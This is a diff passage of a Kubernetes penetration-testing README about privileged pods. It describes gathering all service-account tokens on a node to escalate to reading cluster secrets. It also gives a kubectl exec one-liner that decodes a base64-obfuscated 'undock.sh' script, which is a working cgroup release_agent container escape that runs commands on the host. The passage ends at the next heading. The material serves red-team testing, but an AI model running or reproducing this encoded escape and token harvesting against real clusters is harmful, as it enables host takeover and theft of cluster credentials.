BishopFox/badPods/manifests/priv/README.md

 ### Grab all tokens from all pods on the system

 You can access any secret mounted within any pod on the node you are on.
 In a production cluster, even on a worker node, there is usually at least one pod that has a mounted *token* that is bound to a *service account* that is bound to a *clusterrolebinding*, that gives you access to do things like create pods or view secrets in all namespaces.
 Look for tokens that have permissions to get secrets in kube-system.

 The examples below automate this process for you a bit:

 **If you haven't already, drop the undock.sh script into on your pod.**

-The file will be at /undock.sh:
+The file will be at /undock.sh and is needed to make the next examples work from outside the pod using `kubectl exec`.:
 ```
 kubectl exec -it priv-exec-pod -- bash -c "echo ZD1gZGlybmFtZSAkKGxzIC14IC9zKi9mcy9jKi8qL3IqIHxoZWFkIC1uMSlgCm1rZGlyIC1wICRkL3c7ZWNobyAxID4kZC93L25vdGlmeV9vbl9yZWxlYXNlCnQ9YHNlZCAtbiAncy8uKlxwZXJkaXI9XChbXixdKlwpLiovXDEvcCcgL2V0Yy9tdGFiYAp0b3VjaCAvbzsgZWNobyAkdC9jID4kZC9yZWxlYXNlX2FnZW50O2VjaG8gIiMhL2Jpbi9zaAokMSA+JHQvbyIgPi9jO2NobW9kICt4IC9jO3NoIC1jICJlY2hvIDAgPiRkL3cvY2dyb3VwLnByb2NzIjtzbGVlcCAxO2NhdCAvbwo= | base64 -d > /undock.sh"
 ```

-This is needed to make the next examples work from outside the pod using `kubectl exec`.

 **Run kubectl can-i --list against ALL tokens found on the node**